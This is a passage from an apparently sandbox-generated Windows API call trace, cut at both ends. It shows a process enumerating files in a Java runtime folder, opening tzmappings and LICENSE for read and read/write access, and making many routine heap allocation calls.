HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.963] AreFileApisANSI () returned 1 [0097.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0097.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0097.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 48 [0097.964] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x19c1c)) returned 1 [0097.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0097.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0097.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.964] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x20d0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="tzmappings", cAlternateFileName="TZMAPP~1")) returned 1 [0097.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0097.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0097.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0097.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0097.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0097.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0097.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0097.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0097.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.965] AreFileApisANSI () returned 1 [0097.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings", lpUsedDefaultChar=0x0) returned 50 [0097.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0097.965] AreFileApisANSI () returned 1 [0097.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x466d8 [0097.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x466d8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 50 [0097.965] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzmappings"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0098.039] GetFileType (hFile=0x360) returned 0x1 [0098.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0098.039] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.040] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.040] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.040] CloseHandle (hObject=0x360) returned 1 [0098.040] AreFileApisANSI () returned 1 [0098.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0098.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46358 [0098.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 50 [0098.040] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzmappings"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0098.040] GetFileType (hFile=0x360) returned 0x1 [0098.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0098.041] CloseHandle (hObject=0x360) returned 1 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.042] AreFileApisANSI () returned 1 [0098.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0098.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46908 [0098.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 50 [0098.042] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzmappings"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x20d0)) returned 1 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0098.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.042] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x62, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x760a0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x62, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\t", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⃐")) returned 0 [0098.042] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0098.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0098.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0098.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0098.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0098.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0098.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0098.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0098.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0098.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0098.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0098.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0098.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0098.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0098.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0098.043] AreFileApisANSI () returned 1 [0098.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE", lpUsedDefaultChar=0x0) returned 43 [0098.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0098.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0098.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0098.043] AreFileApisANSI () returned 1 [0098.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0098.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x670c0 [0098.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x670c0, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 43 [0098.043] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE" (normalized: "c:\\program files\\java\\jre1.8.0_144\\license"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.044] GetFileType (hFile=0x27c) returned 0x1 [0098.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x670c0 | out: hHeap=0x20000) returned 1 [0098.044] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.044] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.044] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.044] CloseHandle (hObject=0x27c) returned 1 [0098.044] AreFileApisANSI () returned 1 [0098.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0098.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67300 [0098.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x67300, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 43 [0098.045] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE" (normalized: "c:\\program files\\java\\jre1.8.0_144\\license"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.045] GetFileType (hFile=0x27c) returned 0x1 [0098.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67300 | out: hHeap=0x20000) returned 1 [0098.045] CloseHandle (hObject=0x27c) returned 1 [0098.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 